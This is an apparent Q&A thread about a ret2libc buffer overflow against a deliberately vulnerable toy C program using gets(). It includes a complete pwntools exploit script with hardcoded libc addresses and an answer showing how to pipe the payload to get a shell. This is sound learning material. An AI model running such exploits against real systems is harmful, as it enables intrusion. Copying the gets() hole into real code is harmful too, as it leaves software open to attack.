# ret2libc: problem getting exploit work without pwntools

Tags: c, buffer-overflow, pwntools

I am trying to exploit this program `test` with ret2libc. Only NX is enabled.

```
#include <stdio.h>

void vuln() {
    char buffer[256];
    gets(buffer);
}

int main() {
    vuln();
    return 0;
}
```

I am able to exploit the program with pwntools, but I am unable to exploit it doing `./test < myfile.txt`.

Exploit:

```
#!/bin/python3
from pwn import process, gdb, shellcraft, p32, asm
from pwnlib.util.cyclic import cyclic, cyclic_find
import os

LOCAL_BIN = "./test"
SYSTEM_ADDR = 0xf7e10420 # p system
SHELL_ADDR = 0xf7f5a352 # find &system,+9999999,"/bin/sh"
EXIT = 0xf7e02f80 # p exit
OFFSET = 264 # offset to ebp
P = process(LOCAL_BIN)
G = gdb.attach(P.pid, "b *0x080491c7")

payload = b''
payload = payload.ljust(OFFSET, b'A')
payload += b'BBBB' # fill ebp with \x42
payload += p32(SYSTEM_ADDR)
payload += p32(EXIT)
payload += p32(SHELL_ADDR)

# write bytes to file. ./test < myfile.txt should work the same?
with open('myfile.txt', 'wb') as w:
    w.write(payload)

P.sendline(payload)
P.interactive()
exit()
```

What is the difference from running pwntools and piping bytes into the program?

Comment: "I am unable to exploit it doing `./test < myfile.txt` - what's the effect of this not working?

Comment: I am not sure with what you mean with effects, but the program runs fine when I do it. No segfault or anything like that. I have even run both the programs side by side inside gdb. Look at this https://gyazo.com/e25632d05b9bed9a4fdf99fefde1e2b9. How can this fail? Eveything looks as it should...?

Comment: And since the program runs without fail (and that it enters the system function) I really can't see why it just runs `system` without giving a shell. It just runs without giving any output.

Answer (score 1, accepted):

It seems that I made two critical mistakes when I tried to use `myfile.txt` to exploit the binary.

1. When writing the exploit to the file I did NOT append `\n` to the payload. `P.sendline()` appends this to the payload automatically. Without `\n` the function `gets()` just keeps asking for more input.
2. The second mistake was not to include the `stdin` when piping to `myfile.txt`. I am unsure about the specifics about this, but when running `cat myfile.txt - | ./test` I got the shell I wanted.